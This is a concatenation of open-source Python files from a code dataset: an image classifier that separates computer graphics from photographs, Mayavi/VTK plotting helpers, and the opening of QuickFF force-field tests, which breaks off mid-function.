Restores the weights of the feature extractor and trains a new LDA classifier. The trained LDA can then be reused.
Finally tests the pipeline on the test dataset.
:param nb_train_batch: The number of batches to train (can be on multiple epochs)
:param nb_test_batch: The number of batches to test
:type nb_train_batch: int
:type nb_test_batch: int
"""
self.lda_classifier = LinearDiscriminantAnalysis()
# start a session
print(' start session ...')
with tf.Session(graph=self.graph) as sess:
saver = tf.train.Saver()
print(' variable initialization ...')
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
file_to_restore = input("\nName of the file to restore (Directory : " +
self.dir_ckpt + ') : ')
saver.restore(sess, self.dir_ckpt + file_to_restore)
# training the LDA classifier
features = []
labels = []
for i in range(nb_train_batch):
if (i%10 == 0):
print("Computing features for training batch " + str(i) + '/' + str(nb_train_batch))
batch = self.data.get_next_train_batch(self.batch_size, False, True, True)
feed_dict = {self.x: batch[0], self.y_: batch[1], self.keep_prob: 1.0}
h = self.flatten.eval(feed_dict = feed_dict)
features.append(h)
labels.append(np.argmax(np.array(batch[1]), 1))
features = np.reshape(np.array(features), (self.batch_size*nb_train_batch, features[0].shape[1]))
labels = np.reshape(np.array(labels), (self.batch_size*nb_train_batch,))
print(features.shape)
print(labels.shape)
self.lda_classifier.fit(features, labels)
print(' Testing ...')
# test_auc = 0
features_test = []
labels_test = []
for _ in range(nb_test_batch) :
batch_test = self.data.get_batch_test(self.batch_size, False, True, True)
feed_dict = {self.x:batch_test[0], self.y_: batch_test[1], self.keep_prob: 1.0}
h = self.flatten.eval(feed_dict = feed_dict)
features_test.append(h)
labels_test.append(np.argmax(np.array(batch_test[1]), 1))
features_test = np.reshape(np.array(features_test), (self.batch_size*nb_test_batch, features_test[0].shape[1]))
labels_test = np.reshape(np.array(labels_test), (self.batch_size*nb_test_batch,))
labels_pred = self.lda_classifier.predict(features_test)
test_accuracy = acc(labels_pred, labels_test)
print(" test accuracy %g"%test_accuracy)
self.clf = self.lda_classifier
def svm_training(self, nb_train_batch, nb_test_batch):
"""Trains a SVM classifier (RBF kernel) on top of the feature extractor.
Restores the weights of the feature extractor and trains a new SVM classifier with RBF kernel. The trained SVM can then be reused.
Finally tests the pipeline on the test dataset.
:param nb_train_batch: The number of batches to train (can be on multiple epochs)
:param nb_test_batch: The number of batches to test
:type nb_train_batch: int
:type nb_test_batch: int
"""
self.svm_classifier = SVC(probability = True)
# start a session
print(' start session ...')
with tf.Session(graph=self.graph) as sess:
saver = tf.train.Saver()
print(' variable initialization ...')
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
file_to_restore = input("\nName of the file to restore (Directory : " +
self.dir_ckpt + ') : ')
saver.restore(sess, self.dir_ckpt + file_to_restore)
# training the SVM classifier
features = []
labels = []
for i in range(nb_train_batch):
if (i%10 == 0):
print("Computing features for training batch " + str(i) + '/' + str(nb_train_batch))
batch = self.data.get_next_train_batch(self.batch_size, False, True, True)
feed_dict = {self.x: batch[0], self.y_: batch[1], self.keep_prob: 1.0}
h = self.flatten.eval(feed_dict = feed_dict)
features.append(h)
labels.append(np.argmax(np.array(batch[1]), 1))
features = np.reshape(np.array(features), (self.batch_size*nb_train_batch, features[0].shape[1]))
labels = np.reshape(np.array(labels), (self.batch_size*nb_train_batch,))
print(features.shape)
print(labels.shape)
self.svm_classifier.fit(features, labels)
print(' Testing ...')
# test_auc = 0
features_test = []
labels_test = []
for _ in range(nb_test_batch) :
batch_test = self.data.get_batch_test(self.batch_size, False, True, True)
feed_dict = {self.x:batch_test[0], self.y_: batch_test[1], self.keep_prob: 1.0}
h = self.flatten.eval(feed_dict = feed_dict)
features_test.append(h)
labels_test.append(np.argmax(np.array(batch_test[1]), 1))
features_test = np.reshape(np.array(features_test), (self.batch_size*nb_test_batch, features_test[0].shape[1]))
labels_test = np.reshape(np.array(labels_test), (self.batch_size*nb_test_batch,))
labels_pred = self.svm_classifier.predict(features_test)
test_accuracy = acc(labels_pred, labels_test)
print(" test accuracy %g"%test_accuracy)
self.clf = self.svm_classifier
def test_total_images(self, test_data_path, nb_images,
minibatch_size = 25, decision_rule = 'majority_vote',
show_images = False,
save_images = False,
only_green = True, other_clf = False):
"""Performs boosting for classifying full-size images.
Decomposes each image into patches (with size = self.image_size), computes the posterior probability of each class
and uses a decision rule to classify the full-size image.
Optionally plots or saves the probability map and the original image in the visualization directory.
:param test_data_path: The absolute path to the test dataset. Must contain two directories : CGG/ and Real/
:param nb_images: The number of images to test
:param minibatch_size: The size of the batch to process the patches
:param decision_rule: The decision rule used to aggregate the patch predictions
:param show_images: Whether to show images or not
:param save_images: Whether to save images or not
:param only_green: Whether to take only the green channel of the image
:param other_clf: Whether to use another classifier (LDA or SVM). If True, uses the most recently trained one
:type test_data_path: str
:type nb_images: int
:type minibatch_size: int
:type decision_rule: str
:type show_images: bool
:type save_images: bool
:type only_green: bool
:type other_clf: bool
"""
valid_decision_rule = ['majority_vote', 'weighted_vote']
if decision_rule not in valid_decision_rule:
raise NameError(decision_rule + ' is not a valid decision rule.')
test_name = input(" Choose a name for the test : ")
if(save_images):
if not os.path.exists(self.dir_visualization + test_name):
os.mkdir(self.dir_visualization + test_name)
if not only_green:
print(' No visualization when testing all channels...')
show_images = False
save_images = False
print(' Testing for the database : ' + test_data_path)
print(' start session ...')
with tf.Session(graph=self.graph) as sess:
saver = tf.train.Saver()
print(' variable initialization ...')
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
file_to_restore = input("\nName of the file to restore (Directory : " +
self.dir_ckpt + ') : ')
saver.restore(sess, self.dir_ckpt + file_to_restore)
data_test = il.Test_loader(test_data_path, subimage_size = self.image_size, only_green = only_green)
y = []
scores = []
tp = 0
fp = 0
nb_CGG = 0
accuracy = 0
for i in range(nb_images):
batch, label, width, height, original, image_file = data_test.get_next_image()
batch_size = batch.shape[0]
j = 0
prediction = 0
labels = []
diff = []
nb_im = 0
while j < batch_size:
if other_clf:
feed_dict = {self.x: batch[j:j+minibatch_size], self.keep_prob: 1.0}
features = self.flatten.eval(feed_dict = feed_dict)
pred = np.log(self.clf.predict_proba(features) + 0.00001)
else:
feed_dict = {self.x: batch[j:j+minibatch_size], self.keep_prob: 1.0}
pred = self.y_conv.eval(feed_dict)
nb_im += pred.shape[0]
label_image = np.argmax(pred, 1)
d = np.max(pred, 1) - np.min(pred, 1)
for k in range(d.shape[0]):
diff.append(np.round(d[k], 1))
if decision_rule == 'majority_vote':
prediction += np.sum(label_image)
if decision_rule == 'weighted_vote':
prediction += np.sum(2*d*(label_image - 0.5))
for l in label_image:
labels.append(data_test.image_class[l])
j+=minibatch_size
if(label == 'Real'):
y.append(0)
else:
y.append(1)
# print(prediction/nb_im)
scores.append(prediction/nb_im)
diff = np.array(diff)
if decision_rule == 'majority_vote':
prediction = data_test.image_class[int(np.round(prediction/batch_size))]
if decision_rule == 'weighted_vote':
# int(prediction > 0) picks the class while avoiding a division by zero on ties
prediction = data_test.image_class[int(prediction > 0)]
if label == 'CGG':
nb_CGG += 1
if(label == prediction):
accuracy+= 1
if(prediction == 'CGG'):
tp += 1
else:
if prediction == 'CGG':
fp += 1
print(prediction, label)
if show_images and not save_images:
test_name = ''
if save_images or show_images:
self.image_visualization(path_save = self.dir_visualization + test_name,
file_name = str(i),
images = batch, labels_pred = labels,
true_label = label, width = width,
height = height, diff = diff,
original = original,
show_images = show_images,
save_images = save_images,
save_original = save_images,
prob_map = save_images)
if ((i+1)%10 == 0):
print('\n_______________________________________________________')
print(str(i+1) + '/' + str(nb_images) + ' images processed.')
print('Accuracy : ' + str(round(100*accuracy/(i+1), 2)) + '%')
if tp + fp != 0:
print('Precision : ' + str(round(100*tp/(tp + fp), 2)) + '%')
if nb_CGG != 0:
print('Recall : ' + str(round(100*tp/nb_CGG,2)) + '%')
print('_______________________________________________________\n')
print(np.array(y))
fpr, tpr, thresholds = roc_curve(np.array(y), 0.5 + np.array(scores)/10)
print(0.5 + np.array(scores)/np.max(np.array(scores)))
print(thresholds)
filename = '/home/smg/v-nicolas/ROC/' + test_name + '.pkl'
print('Saving tpr and fpr in file : ' + filename)
pickle.dump((fpr,tpr), open(filename, 'wb'))
print('\n_______________________________________________________')
print('Final Accuracy : ' + str(round(100*accuracy/(nb_images), 3)) + '%')
print('Final Precision : ' + str(round(100*tp/(tp + fp), 3)) + '%')
print('Final Recall : ' + str(round(100*tp/nb_CGG, 3)) + '%')
print('Final AUC : ' + str(round(100*auc(fpr, tpr), 3)) + '%')
print('_______________________________________________________\n')
def image_visualization(self, path_save, file_name, images, labels_pred,
true_label, width, height, diff, original = None,
show_images = False, save_images = False,
prob_map = False, save_original = False):
"""Computes image visualization and save/show it
Permits to visualize the probability map of the image. Green color represents correctly classified patches
and red wrongly classified ones. The intensity depends on the level of certainty.
:param path_save: The absolute path where images should be saved
:param file_name: The name of input image file
:param images: An array containing patches extracted from the full-size image
:param width: The width of the full-size image
:param height: The height of the full-size image
:param diff: Differences between log posterior probabilities for each patch
:param original: The original image
:param show_images: Whether to show images or not
:param save_images: Whether to save images or not
:param prob_map: Whether to save the probability map
:param save_original: Whether to save the original image
:type path_save: str
:type file_name: str
:type images: numpy array
:type width: int
:type height: int
:type diff: numpy array
:type original: numpy array
:type show_images: bool
:type save_images: bool
:type prob_map: bool
:type save_original: bool
"""
nb_width = int(width/self.image_size)
nb_height = int(height/self.image_size)
m = 10
img = plt.figure(figsize = (nb_width, nb_height))
gs1 = gridspec.GridSpec(nb_height, nb_width)
for i in range(len(images)):
cdict_green = {'red': ((0.0,0.0,0.0),
(1.0,1.0 - diff[i]/m,1.0 - diff[i]/m)),
'blue': ((0.0,0.0,0.0),
(1.0,1.0 - diff[i]/m,1.0 - diff[i]/m)),
'green': ((0.0,0.0,0.0),
(1.0,1.0,1.0))}
cdict_red = {'red': ((0.0,0.0,0.0),
(1.0,1.0,1.0)),
'blue': ((0.0,0.0,0.0),
(1.0,1.0 - diff[i]/m,1.0 - diff[i]/m)),
'green': ((0.0,0.0,0.0),
(1.0,1.0 - diff[i]/m,1.0 - diff[i]/m))}
ax1 = plt.subplot(gs1[i])
ax1.axis('off')
if labels_pred[i] == 'Real':
if diff[i] > 0.4:
cmap = mcolors.LinearSegmentedColormap('my_green', cdict_green, 100)
else:
cmap = 'gray'
else:
if diff[i] > 0.4:
cmap = mcolors.LinearSegmentedColormap('my_red', cdict_red, 100)
else:
cmap = 'gray'
images[i,0,0,0] = 0
images[i,0,1,0] = 1
plt.imshow(images[i,:,:,0], cmap = cmap)
ax1.set_xticklabels([])
ax1.set_yticklabels([])
# ax1.text(40, 50, str(diff[i]))
gs1.update(wspace=.0, hspace=.0)
if show_images:
plt.show(img)
if save_images:
plt.savefig(path_save + '/vis_' + file_name + '.png',
bbox_inches='tight',
pad_inches=0.0)
plt.close()
if save_images:
if save_original:
plt.figure()
plt.axis('off')
plt.imshow(original, cmap = 'gray')
plt.savefig(path_save + '/vis_' + file_name + '_original' + '.png',
bbox_inches='tight',
pad_inches=0.0)
if prob_map:
img = plt.figure(figsize = (nb_width, nb_height))
gs1 = gridspec.GridSpec(nb_height, nb_width)
for i in range(len(images)):
map_im = np.ones((self.image_size, self.image_size))
map_im[0,0] = 0
cdict_green = {'red': ((0.0,0.0,0.0),
(1.0,1.0 - diff[i]/m,1.0 - diff[i]/m)),
'blue': ((0.0,0.0,0.0),
(1.0,1.0 - diff[i]/m,1.0 - diff[i]/m)),
'green': ((0.0,0.0,0.0),
(1.0,1.0,1.0))}
cdict_red = {'red': ((0.0,0.0,0.0),
(1.0,1.0,1.0)),
'blue': ((0.0,0.0,0.0),
(1.0,1.0 - diff[i]/m,1.0 - diff[i]/m)),
'green': ((0.0,0.0,0.0),
(1.0,1.0 - diff[i]/m,1.0 - diff[i]/m))}
ax1 = plt.subplot(gs1[i])
ax1.axis('off')
if labels_pred[i] == true_label:
if diff[i] > 0.4:
cmap = mcolors.LinearSegmentedColormap('my_green', cdict_green, 100)
else:
cmap = 'gray'
map_im = map_im*0.7
else:
if diff[i] > 0.4:
cmap = mcolors.LinearSegmentedColormap('my_red', cdict_red, 100)
else:
cmap = 'gray'
map_im = map_im*0.7
plt.imshow(map_im, cmap = cmap)
ax1.set_xticklabels([])
ax1.set_yticklabels([])
gs1.update(wspace=.0, hspace=.0)
if show_images:
plt.show(img)
if save_images:
plt.savefig(path_save + '/vis_' + file_name + '_probmap' + '.png',
bbox_inches='tight',
pad_inches=0.0)
plt.close()
del(img)
def show_filtered(self, image_file):
print(' Loading image from file : ' + image_file)
im = Image.open(image_file)
im = np.reshape(np.array([np.asarray(im)]), (1,self.image_size, self.image_size, 1))
print(' start session ...')
with tf.Session(graph=self.graph) as sess:
saver = tf.train.Saver()
print(' variable initialization ...')
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
file_to_restore = input("\nName of the file to restore (Directory : " +
self.dir_ckpt + ') : ')
saver.restore(sess, self.dir_ckpt + file_to_restore)
feed_dict = {self.x: im, self.keep_prob: 1.0}
filtered = self.h_conv1.eval(feed_dict = feed_dict)
for i in range(filtered.shape[3]):
plt.figure()
plt.imshow(filtered[0,:,:,i], cmap = 'gray')
plt.show()
def test_splicing(self, data_path, nb_images, save_images = True, show_images = False,
minibatch_size = 25):
"""Computes image visualization for spliced images
Decomposes each image into patches (with size = self.image_size), computes the posterior probability of each class
and show the probability map.
:param data_path: Path to the spliced images. Should contain two directories : CGG/ and Real/
:param nb_images: Number of spliced images to process
:param show_images: Whether to show images or not
:param save_images: Whether to save images or not
:param minibatch_size: The size of the batch to process the patches
:type data_path: str
:type nb_images: int
:type show_images: bool
:type save_images: bool
:type minibatch_size: int
"""
if(save_images):
test_name = input(" Choose a name for the test : ")
path_save = self.dir_visualization + test_name
if not os.path.exists(self.dir_visualization + test_name):
os.mkdir(self.dir_visualization + test_name)
else:
path_save = ''
print(' start session ...')
with tf.Session(graph=self.graph) as sess:
saver = tf.train.Saver()
print(' variable initialization ...')
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
file_to_restore = input("\nName of the file to restore (Directory : " +
self.dir_ckpt + ') : ')
saver.restore(sess, self.dir_ckpt + file_to_restore)
data_test = il.Test_loader(data_path,
subimage_size = self.image_size, only_green = self.only_green)
for i in range(nb_images):
batch, label, width, height, original, file_name = data_test.get_next_image()
batch_size = batch.shape[0]
j = 0
labels = []
diff = []
while j < batch_size:
feed_dict = {self.x: batch[j:j+minibatch_size], self.keep_prob: 1.0}
pred = self.y_conv.eval(feed_dict)
label_image = np.argmax(pred, 1)
d = np.max(pred, 1) - np.min(pred, 1)
for k in range(d.shape[0]):
diff.append(np.round(d[k], 1))
for l in label_image:
labels.append(data_test.image_class[l])
j+=minibatch_size
diff = np.array(diff)
self.image_visualization(path_save = path_save,
file_name = str(i),
images = batch, labels_pred = labels,
true_label = label, width = width,
height = height, diff = diff,
original = original,
show_images = show_images,
save_images = save_images,
prob_map = save_images,
save_original= save_images)
if __name__ == '__main__':
using_GPU = False
config = 'Personal' # assumed default (matches the Model constructor); set to 'server' for the server paths below
if config == 'server':
database_path = '/work/smg/v-nicolas/level-design_raise_100/'
else:
database_path = '/home/nicolas/Database/level-design_raise_100/'
image_size = 100
nb_train_batch = 5000
nb_test_batch = 80
nb_validation_batch = 40
clf = Model(database_path, image_size, nbins = 11,
batch_size = 50, feature_extractor = 'Stats',
using_GPU = using_GPU)
# clf.mean_histogram()
# clf.show_filtered('/home/nicolas/Database/level-design_dresden_100/train/CGG/train153.jpg')
clf.train(nb_train_batch = nb_train_batch,
nb_test_batch = nb_test_batch,
nb_validation_batch = nb_validation_batch,
show_filters = False)
# clf.svm_training(nb_train_batch = 800, nb_test_batch = 80)
if config == 'server':
test_data_path = '/work/smg/v-nicolas/level-design_raise_650/test/'
else:
test_data_path = '/home/nicolas/Database/level-design_raise_650/test/'
clf.test_total_images(test_data_path = test_data_path,
nb_images = 720, decision_rule = 'weighted_vote',
show_images = False,
save_images = False,
only_green = True,
other_clf = False)
if config == 'server':
test_data_path = '/work/smg/v-nicolas/level-design_raise/test/'
else:
test_data_path = '/home/nicolas/Database/level-design_raise/test/'
clf.test_total_images(test_data_path = test_data_path,
nb_images = 720, decision_rule = 'weighted_vote',
show_images = False,
save_images = False,
only_green = True,
other_clf = False)
if config == 'server':
splicing_data_path = '/work/smg/v-nicolas/splicing/'
else:
splicing_data_path = '/home/nicolas/Database/splicing/'
clf.test_splicing(data_path = splicing_data_path,
nb_images = 50,
minibatch_size = 25,
show_images = False,
save_images = True)
|
NicoRahm/CGvsPhoto
|
CGvsPhoto/model.py
|
Python
|
mit
| 57,552
|
[
"Gaussian"
] |
5b36eeb2f1d560d32900c7533d1257625f20971760c2c8cda10fdbfbe1d2ac66
|
import mayavi
import vtk
import pyvtk
import numpy as N
try:
from vtk.util import vtkConstants
except ImportError:
class vtkConstants:
pass
vtkConstants.VTK_CHAR=2
vtkConstants.VTK_UNSIGNED_CHAR = 3
vtkConstants.VTK_SHORT = 4
vtkConstants.VTK_UNSIGNED_SHORT = 5
vtkConstants.VTK_INT = 6
vtkConstants.VTK_UNSIGNED_INT = 7
vtkConstants.VTK_LONG = 8
vtkConstants.VTK_UNSIGNED_LONG = 9
vtkConstants.VTK_FLOAT =10
vtkConstants.VTK_DOUBLE =11
def array2vtk(z):
"""Converts a numpy Array to a VTK array object directly. The
resulting array copies the data in the passed array. The
array can therefore be deleted safely. This works for real arrays.
"""
arr_vtk = {'c':vtkConstants.VTK_UNSIGNED_CHAR,
'b':vtkConstants.VTK_UNSIGNED_CHAR,
'1':vtkConstants.VTK_CHAR,
's':vtkConstants.VTK_SHORT,
'i':vtkConstants.VTK_INT,
'l':vtkConstants.VTK_LONG,
'f':vtkConstants.VTK_FLOAT,
'd':vtkConstants.VTK_DOUBLE,
'F':vtkConstants.VTK_FLOAT,
'D':vtkConstants.VTK_DOUBLE }
# A dummy array used to create others.
f = vtk.vtkFloatArray()
# First create an array of the right type by using the typecode.
tmp = f.CreateDataArray(arr_vtk[z.dtype.char])
tmp.SetReferenceCount(2) # Prevents memory leak.
zf = N.ravel(z)
tmp.SetNumberOfTuples(len(zf))
tmp.SetNumberOfComponents(1)
tmp.SetVoidArray(zf, len(zf), 1)
# Now create a new array that is a DeepCopy of tmp. This is
# required because tmp does not copy the data from the NumPy array
# and will point to garbage if the NumPy array is deleted.
arr = f.CreateDataArray(arr_vtk[z.dtype.char])
arr.SetReferenceCount(2) # Prevents memory leak.
arr.DeepCopy(tmp)
return arr
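# Usage sketch (assumption): converting a small numpy array and reading a
# value back through the VTK API:
#
# a = N.array([1.0, 2.0, 3.0], 'd')
# va = array2vtk(a)
# assert va.GetNumberOfTuples() == 3 and va.GetValue(1) == 2.0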
def create_structured_points(x, y, z):
"""Creates a vtkStructuredPoints object given input data in the
form of numpy arrays.
Input Arguments:
x -- Array of x-coordinates. These should be regularly spaced.
y -- Array of y-coordinates. These should be regularly spaced.
z -- Array of z values for the x, y values given.
"""
nx = len(x)
ny = len(y)
nz = N.size(z)
assert nx*ny == nz, "len(x)*len(y) != len(z). "\
"You passed nx=%d, ny=%d, nz=%d"%(nx, ny, nz)
xmin, ymin = x[0], y[0]
dx, dy= (x[1] - x[0]), (y[1] - y[0])
sp = vtk.vtkStructuredPoints()
sp.SetDimensions(nx, ny, 1)
sp.SetOrigin(xmin, ymin, 0)
sp.SetSpacing(dx, dy, 1)
sc = array2vtk(z)
sp.GetPointData().SetScalars(sc)
return sp
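# Usage sketch (assumption): z holds one value per (y, x) grid point, so
# len(x)*len(y) must equal z.size:
#
# x = N.linspace(0.0, 1.0, 50)
# y = N.linspace(0.0, 2.0, 100)
# z = N.sin(x[N.newaxis, :]) * N.cos(y[:, N.newaxis])  # shape (100, 50)
# sp = create_structured_points(x, y, z)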
def create_structured_points3D(x, y, z, s):
"""Creates a vtkStructuredPoints object given input data in the
form of numpy arrays.
Input Arguments:
x -- Array of x-coordinates. These should be regularly spaced.
y -- Array of y-coordinates. These should be regularly spaced.
z -- Array of z-coordinates. These should be regularly spaced.
s -- Array of scalar values for the x, y, z values given.
"""
nx = len(x)
ny = len(y)
nz = len(z)
ns = N.size(s)
assert nx*ny*nz == ns, "len(x)*len(y)*len(z) != len(s). "\
"You passed nx=%d, ny=%d, nz=%d, ns=%d"%(nx, ny, nz, ns)
xmin, ymin, zmin = x[0], y[0], z[0]
dx, dy, dz= (x[1] - x[0]), (y[1] - y[0]), (z[1] - z[0])
sp = vtk.vtkStructuredPoints()
sp.SetDimensions(nx, ny, nz)
sp.SetOrigin(xmin, ymin, zmin)
sp.SetSpacing(dx, dy, dz)
sc = array2vtk(s)
sp.GetPointData().SetScalars(sc)
return sp
def surf(x,y,z,warp=1, scale=[1.0, 1.0, 1.0], norm=0, viewer=None,
f_args=(), f_keyw={}):
"""3D surface plot of z, a 2D array"""
if norm:
x = (x-x.min())/(x.max()-x.min())
y = (y-y.min())/(y.max()-y.min())
z = (z-z.min())/(z.max()-z.min())
xs = x*scale[0]
ys = y*scale[1]
data = create_structured_points(xs, ys, z)
if not viewer:
v = mayavi.mayavi()
else:
v = viewer
v.open_vtk_data(data)
if warp:
f = v.load_filter('WarpScalar', 0)
f.fil.SetScaleFactor(scale[2])
n = v.load_filter('PolyDataNormals', 0)
n.fil.SetFeatureAngle(45)
m = v.load_module('SurfaceMap', 0)
if not viewer:
a = v.load_module('Axes', 0)
a.axes.SetCornerOffset(0.0)
if (min(scale) != max(scale)) or (scale[0] != 1.0):
a.axes.UseRangesOn()
a.axes.SetRanges(x[0], x[-1], y[0], y[-1], z.min(), z.max()) # 'zval' was undefined; use the plotted array z
o = v.load_module('Outline', 0)
v.Render()
return v
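# Usage sketch (assumption): warped surface plot of a 2D Gaussian bump,
# stretching the z-axis by a factor of 2:
#
# x = N.linspace(-3.0, 3.0, 60)
# y = N.linspace(-3.0, 3.0, 60)
# z = N.exp(-(x[N.newaxis, :]**2 + y[:, N.newaxis]**2))
# v = surf(x, y, z, warp=1, scale=[1.0, 1.0, 2.0])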
def isosurf(x,y,z,s, scale=[1.0, 1.0, 1.0, 1.0], norm=0, viewer=None,
f_args=(), f_keyw={}):
"""iso-surface plot of s, a 3D array,"""
if norm:
x = (x-x.min())/(x.max()-x.min())
y = (y-y.min())/(y.max()-y.min())
z = (z-z.min())/(z.max()-z.min())
xs = x*scale[0]
ys = y*scale[1]
zs = z*scale[2]
data = create_structured_points3D(xs, ys, zs, s)
if not viewer:
v = mayavi.mayavi()
else:
v = viewer
v.open_vtk_data(data)
m = v.load_module('IsoSurface')
if not viewer:
a = v.load_module('Axes', 0)
a.axes.SetCornerOffset(0.0)
if (min(scale) != max(scale)) or (scale[0] != 1.0):
a.axes.UseRangesOn()
a.axes.SetRanges(x[0], x[-1], y[0], y[-1], z[0], z[-1])
o = v.load_module('Outline', 0)
v.Render()
return v
def volume(x,y,z,s, scale=[1.0, 1.0, 1.0, 1.0], viewer=None,
f_args=(), f_keyw={}):
"""volume render s, a 3D array. s gets rescaled as an "unsigned
char" 0..127"""
xs = x*scale[0]
ys = y*scale[1]
zs = z*scale[2]
sscale = s.max() - s.min()
sd = ((s-s.min())*127/sscale).astype('b')
data = create_structured_points3D(xs, ys, zs, sd)
if not viewer:
v = mayavi.mayavi()
else:
v = viewer
v.open_vtk_data(data)
m = v.load_module('Volume')
if not viewer:
a = v.load_module('Axes', 0)
a.axes.SetCornerOffset(0.0)
if (min(scale) != max(scale)) or (scale[0] != 1.0):
a.axes.UseRangesOn()
a.axes.SetRanges(x[0], x[-1], y[0], y[-1], z[0], z[-1])
o = v.load_module('Outline', 0)
v.Render()
return v
|
martindurant/misc
|
mayatools.py
|
Python
|
mit
| 6,427
|
[
"Mayavi",
"VTK"
] |
6a04fc446c400a4003a8bb746962470a83db8bb8a5d6804c35d4cc3ef596cb98
|
# -*- coding: utf-8 -*-
# QuickFF is a code to quickly derive accurate force fields from ab initio input.
# Copyright (C) 2012 - 2019 Louis Vanduyfhuys <Louis.Vanduyfhuys@UGent.be>
# Steven Vandenbrande <Steven.Vandenbrande@UGent.be>,
# Jelle Wieme <Jelle.Wieme@UGent.be>,
# Toon Verstraelen <Toon.Verstraelen@UGent.be>, Center for Molecular Modeling
# (CMM), Ghent University, Ghent, Belgium; all rights reserved unless otherwise
# stated.
#
# This file is part of QuickFF.
#
# QuickFF is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# QuickFF is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>
#
#--
from molmod.units import angstrom, kjmol, rad, deg
from molmod.ic import _dihed_angle_low, dihed_angle
from quickff.valence import ValenceFF
from quickff.settings import Settings
from quickff.tools import set_ffatypes
from itertools import permutations
from .common import log, read_system
import numpy as np
def check_terms(name):
'Check whether all ICs are present in ValenceFF instance'
#TODO: CROSS terms
with log.section('NOSETST', 2):
system, ref = read_system(name)
set_ffatypes(system, 'high')
valence = ValenceFF(system, Settings())
#check if every bond is present and harmonic
for bond in system.iter_bonds():
found = False
for term in valence.iter_terms('BONDHARM'):
at0, at1 = term.get_atoms()
if bond[0]==at0 and bond[1]==at1 \
or bond[0]==at1 and bond[1]==at0:
assert not found, 'BondHarm term %s was already found!' %str(bond)
found = True
assert found, 'No BondHarm term found for bond %s' %str(bond)
#check if every bend is present
for angle in system.iter_angles():
found = False
for term in valence.iter_terms('BENDAHARM'):
at0, at1, at2 = term.get_atoms()
if angle[0]==at0 and angle[1]==at1 and angle[2]==at2 \
or angle[0]==at2 and angle[1]==at1 and angle[2]==at0:
assert not found, 'BendAHarm term %s was already found!' %str(angle)
found = True
assert found, 'No BendAHarm term found for angle %s' %str(angle)
#check if every dihedral is present
for dihed in system.iter_dihedrals():
found = False
for term in valence.iter_terms('Tors'):
at0, at1, at2, at3 = term.get_atoms()
if dihed[0]==at0 and dihed[1]==at1 and dihed[2]==at2 and dihed[3]==at3\
or dihed[0]==at3 and dihed[1]==at2 and dihed[2]==at1 and dihed[3]==at0:
assert not found, 'Torsion term %s was already found!' %str(dihed)
found = True
assert found, 'No Torsion term found for dihedral %s' %str(dihed)
#check that every oop distance is present: Harm when rv = 0, SqHarm otherwise
for oop in system.iter_oops():
found = False
for term in valence.iter_terms('^OOPDIST/.*$', use_re=True):
at0, at1, at2, at3 = term.get_atoms()
for p0, p1, p2 in permutations([at0, at1, at2]):
if oop[0]==p0 and oop[1]==p1 and oop[2]==p2 and oop[3]==at3:
assert not found, 'OopDist term %s was already found!' %str(oop)
found = True
for term in valence.iter_terms('SQOOPDIST'):
at0, at1, at2, at3 = term.get_atoms()
for p0, p1, p2 in permutations([at0, at1, at2]):
if oop[0]==p0 and oop[1]==p1 and oop[2]==p2 and oop[3]==at3:
assert not found, 'SqOopDist term %s was already found!' %str(oop)
found = True
assert found, 'No (Sq)OopDist term found for oop %s (which is %s)' %(
str(oop),
' '.join([system.ffatypes[system.ffatype_ids[i]] for i in [at0,at1,at2,at3]])
)
def get_analytic_numeric_hessian(valence, term, **ffpars):
#setup ff
valence.set_params(term.index, **ffpars)
for term2 in valence.iter_terms():
assert len(term2.slaves)==0
if term2.index!=term.index:
valence.set_params(term2.index, rv0=0.0, fc=0.0)
#compute hcov using built-in function (which uses yaff routine)
ref = valence.get_hessian_contrib(term.index)
#compute hcov numerically using valence.calc_energy
eps = 1e-4
natoms = len(valence.system.pos)
num = np.zeros([3*natoms, 3*natoms], float)
for i in range(3*natoms):
Di = np.zeros(3*natoms, float)
Di[i] = eps
Di = Di.reshape([natoms, 3])
for j in range(3*natoms):
Dj = np.zeros(3*natoms, float)
Dj[j] = eps
Dj = Dj.reshape([natoms, 3])
tmp = valence.calc_energy(valence.system.pos + Di + Dj)
tmp -= valence.calc_energy(valence.system.pos + Di - Dj)
tmp -= valence.calc_energy(valence.system.pos - Di + Dj)
tmp += valence.calc_energy(valence.system.pos - Di - Dj)
num[i,j] = tmp/(2.0*eps)**2
num = 0.5*(num+num.T)
return ref, num
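# Added note (sketch): the double loop above evaluates the standard central
# finite-difference stencil for mixed second derivatives,
#
#   H_ij ~ [E(x+e_i+e_j) - E(x+e_i-e_j) - E(x-e_i+e_j) + E(x-e_i-e_j)] / (2*eps)**2
#
# with displacements of size eps, followed by an explicit symmetrization
# num = 0.5*(num + num.T).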
def get_indices_zero_nonzero(term, natoms):
'''
Return list of index tuples inonzero and izero:
inonzero: index tuples for which term contributes to the corresponding
Hessian element
izero : index tuples for which term does not contribute to the
corresponding Hessian element
'''
inonzero = [[],[]]
izero = [[],[]]
for i in range(natoms):
iindices = [3*i,3*i,3*i, 3*i+1,3*i+1,3*i+1, 3*i+2,3*i+2,3*i+2]
for j in range(natoms):
jindices = [3*j,3*j+1,3*j+2, 3*j,3*j+1,3*j+2, 3*j,3*j+1,3*j+2]
if i in term.get_atoms() and j in term.get_atoms():
inonzero[0] += iindices
inonzero[1] += jindices
else:
izero[0] += iindices
izero[1] += jindices
return inonzero, izero
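# Illustrative sketch (hypothetical): for natoms = 2 and a term acting only on
# atom 0, the 3x3 Cartesian block with rows and columns 0..2 is collected in
# inonzero, while every block touching atom 1 (rows or columns 3..5) goes to
# izero.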
def get_dihedral_angle(term, system):
dihed = term.get_atoms()
if system.cell.nvec>0:
d10 = system.pos[dihed[0]] - system.pos[dihed[1]]
d12 = system.pos[dihed[2]] - system.pos[dihed[1]]
d23 = system.pos[dihed[3]] - system.pos[dihed[2]]
system.cell.mic(d10)
system.cell.mic(d12)
system.cell.mic(d23)
return _dihed_angle_low(d10, d12, d23, 0)[0]
else:
